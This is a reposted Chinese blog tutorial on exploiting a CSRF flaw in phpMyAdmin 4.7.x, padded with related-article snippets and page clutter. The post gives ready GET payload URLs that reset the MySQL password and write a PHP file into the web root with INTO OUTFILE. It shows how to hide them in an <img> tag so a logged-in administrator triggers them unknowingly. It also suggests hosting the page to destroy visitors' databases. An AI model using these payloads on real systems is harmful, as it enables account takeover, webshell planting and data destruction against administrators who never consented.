phpMyAdmin 4.7.x CSRF

最新推荐文章于 2024-07-15 15:59:36 发布
最新推荐文章于 2024-07-15 15:59:36 发布
阅读量81 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/zaqzzz/p/10120991.html
版权

phpMyAdmin 4.7.x CSRF

场景:管理员登陆phpmyadmin之后,我试验了一下,发现只要是登陆session没有失效应该是都可以的,

利用,phpmyadmin可以通过get方式操作数据库,此版本存在csrf漏洞,通过构造一个链接(不是傻子基本都发现),所以是藏到一个地方让他自己偷偷的加载。

修改管理员密码,因为可以通过get方式执行操作,所以构造语句:

http://url/pma/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27pass%27); 
就是把phpmyadmin首页进去的index.php换成sql.php?~~~~~~
藏到html里,通过image标签让浏览器自己预先加载就可以达到了偷偷改密码的目的。
<img src="payload">

写马。

和①原理上是一样的,都是get构造语句,执行不同的语句直接在后边构造就行。

http://url/pma/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';

即使是管理员,有的时候也不一定能写,主要原因是参数

secure_file_priv

限制了读写操作,这个如果被限制的话没有什么很好的解决办法,因为要改配置文件。

结合https://www.cnblogs.com/zaqzzz/p/9355004.html

为所欲为,构造语句的时候加上分号就好了。

总结:

感觉这个使用的不会太多,首先这个完整的路径只要在你扫描到phpmyadmin的位置才能利用,还有尴尬的是你怎么知道谁是管理员以及让他打开html。

不过挂在自己搭建的服务器上,只要他们访问就把数据库破坏这也是个方法。。。

转载于:https://www.cnblogs.com/zaqzzz/p/10120991.html

weixin_30588907
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpMyAdmin v4.7.5
12-16
phpMyAdmin是一个以PHP为基础,以Web-base方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
phpMyAdmin 数据库管理工具 v4.7.8
11-07
phpMyAdmin是一个以PHP为基础,以Web-ba<x>se方式架构在网站主机上的MySQL的资料库管理工具。phpMyAdmin 可以管理整个MySQL服务器(需要超级用户),也可以管理单个数据库。为了实现后一种,你将
phpMyAdmin 4.7.x CSRF 漏洞利用
Ambulong的博客
06-12 633
phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。 该篇文章我们将结合VulnSpy的在线phpMyAdmin环境来熟悉该漏洞的利用。 在线 phpMyAdmin CSRF 演练地址:https://www.v...
php csrf打MySQL,数据库管理工具phpMyAdmin出现CSRF漏洞
weixin_35757732的博客
03-25 110
原标题:数据库管理工具phpMyAdmin出现CSRF漏洞导语攻击者通过伪造恶意URL发送给受害者,如果登录phpMyAdmin的用户点击了该链接,那么数据库可能会执行DROP TABLE操作。 CSRF(跨站请求伪造)是常见的web漏洞之一,位列2013 OWASP TOP10。之前,研究人员发现并报告了Intel网站的CSRF漏洞,攻击者利用该漏洞可以从已认证用户的购物车中移除商品。在phpM...
php csrf打MySQL_phpMyAdmin 4.7.x CSRF 漏洞利用
weixin_39629352的博客
01-31 102
phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。该篇文章我们将结合VulnSpy的在线phpMyAdmin环境来熟悉该漏洞的利用。注:重启演示靶机即可重置靶机1 在线创建 phpMyAdmin 环境跳转到 V...
mysql4.7_热门MySQL开源管理工具phpMyAdmin < 4.7.7 CSRF漏洞
weixin_34911236的博客
02-02 143
phpMyAdmin的开发人员发布更新,修复了一个严重的漏洞。该漏洞可让目标管理员通过点击特殊构造的链接进行恶意数据库操作。事件背景phpMyAdmin是一款免费的开源工具,旨在管理互联网上的MySQL数据库。phpMyAdmin每个月的下载量超过20万次,是数一数二的MySQL数据库管理工具。phpMyAdmin广泛用于管理多个通过WordPress、Joomla以及其它CMS...
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpMyAdmin-4.7.8-all-languages.zip
04-12
phpmyAdmin是一个用PHP编写的...通过phpMyAdmin可以完全对数据库进行操作,例如建立、复制/删除数据等等。 管理 MySQL-server 以及单一数据库的 PHP 程序,对于不熟悉 MySQL 命令列指令的人来说,是很方便的管理工具。
Adminer 4.7.8 中文版
05-01
Adminer(原phpMinAdmin)是用PHP编写的一个全功能的数据库管理工具,类似phpMyAdmin,它是由一个单一的文件准备部署到目标服务器的,可用于MySQL和PostgreSQL、SQLite、MS SQL、甲骨文、Firebird、SimpleDB、Elastic...
adminer MySQL管理客户端 v4.7.8
12-15
为您提供adminer MySQL管理客户端下载,Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言...
phpmyadmin config.inc.php配置示例
10-26
个config.inc.php文件为phpmyadmin的配置信息,下面有个已配置好的例子,大家可以参考下
PHP编程开发工具有哪些?
红客网络编程与渗透技术
07-10 1030
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 1007
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 573
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
ns3-gym入门(二):linear-mesh例子详解
最新发布
zoe2222226666的博客
07-15 682
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 412
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值